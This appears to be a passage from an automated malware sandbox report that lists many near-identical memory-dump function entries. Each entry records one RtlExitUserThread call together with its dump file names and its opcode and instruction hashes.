                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 053F0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 053F0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761347492.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 058D0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 058D0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761507668.00000000058D0000.00000040.00000001.sdmp, Offset: 058D0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05D90000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05D90023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762199550.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05F90000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05F90023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762602039.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01200000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01200023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760208658.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01000000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01000023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760113689.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 011C0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 011C0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760198296.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05950000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05950023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761532512.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05B50000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05B50023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761614762.0000000005B50000.00000040.00000001.sdmp, Offset: 05B50000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E00000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00E00023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760031372.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F00000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00F00023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760076321.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05260000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05260023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761289628.0000000005260000.00000040.00000001.sdmp, Offset: 05260000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05660000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05660023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761433020.0000000005660000.00000040.00000001.sdmp, Offset: 05660000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06010000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06010023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762669218.0000000006010000.00000040.00000001.sdmp, Offset: 06010000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06110000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06110023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762790436.0000000006110000.00000040.00000001.sdmp, Offset: 06110000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03390000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03390023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760875266.0000000003390000.00000040.00000001.sdmp, Offset: 03390000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05C10000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05C10023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761653508.0000000005C10000.00000040.00000001.sdmp, Offset: 05C10000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05D10000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05D10023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761839940.0000000005D10000.00000040.00000001.sdmp, Offset: 05D10000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05990000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05990023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761543803.0000000005990000.00000040.00000001.sdmp, Offset: 05990000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05A90000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05A90023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761584803.0000000005A90000.00000040.00000001.sdmp, Offset: 05A90000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05890000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05890023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761497364.0000000005890000.00000040.00000001.sdmp, Offset: 05890000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03450000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03450023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760918132.0000000003450000.00000040.00000001.sdmp, Offset: 03450000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 012C0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 012C0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760260578.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05E90000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05E90023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762512079.0000000005E90000.00000040.00000001.sdmp, Offset: 05E90000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05130000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05130023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761224058.0000000005130000.00000040.00000001.sdmp, Offset: 05130000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06400000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06400023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.763113296.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00D40000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00D40023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760000713.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
